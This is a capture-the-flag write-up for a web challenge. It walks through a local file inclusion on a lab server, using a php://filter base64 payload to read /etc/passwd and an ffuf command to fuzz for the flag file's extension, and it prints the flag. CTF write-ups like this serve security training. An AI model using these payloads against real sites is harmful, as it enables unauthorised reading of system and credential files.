The Lair (web)

The Lair web challenge solution.

Let's start by visiting the web page:

Showing homepage

We see a simple page with some text, and other languages are available and when visiting one of them, the URL is changed to:

http://127.0.0.1:8080/?lang=de.php

And some additional text is being shown in the page, this hints towards an LFI, but the description of the challenge told us that "the flag isn't .txt" which means we need to fuzz for extensions, and find a way to read all files (because some file types wont show in the browser).

Let's test a PHP filter that encodes to base64 to read files:

According to HackTricks we can use the following payload in LFI to encode the output of files:

php://filter/read=convert.base64-encode/resource=/etc/passwd

in Payload:
http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/etc/passwd

Testing it to see if it's applicable here on /etc/passwd, we see Base64 data on the webpage, and decoding it in CyberChef gives us:

LFI POC

Now we can start using ffuf to see if anything reads in /flag.EXTENSION.

ffuf -u http://127.0.0.1:8080/?lang=php://filter/read=convert.base64-encode/resource=/flagFUZZ -w raft-large-extensions-lowercase.txt

After running that command, we will see a lot of output because all requests are 200 (no file is read), so we need to add a size filter to it: -fs 3979 as the size was shown, and then we get:

.php                    [Status: 200, Size: 4043, Words: 1553, Lines: 152, Duration: 1ms]

PHP is a valid hit, let's read it and see it in CyberChef gives us:

<?php

tuxCTF{F!lTer$?_but_I_THOU6Ht_BlooD}

?>

Done! Happy Hacking :) 🧛.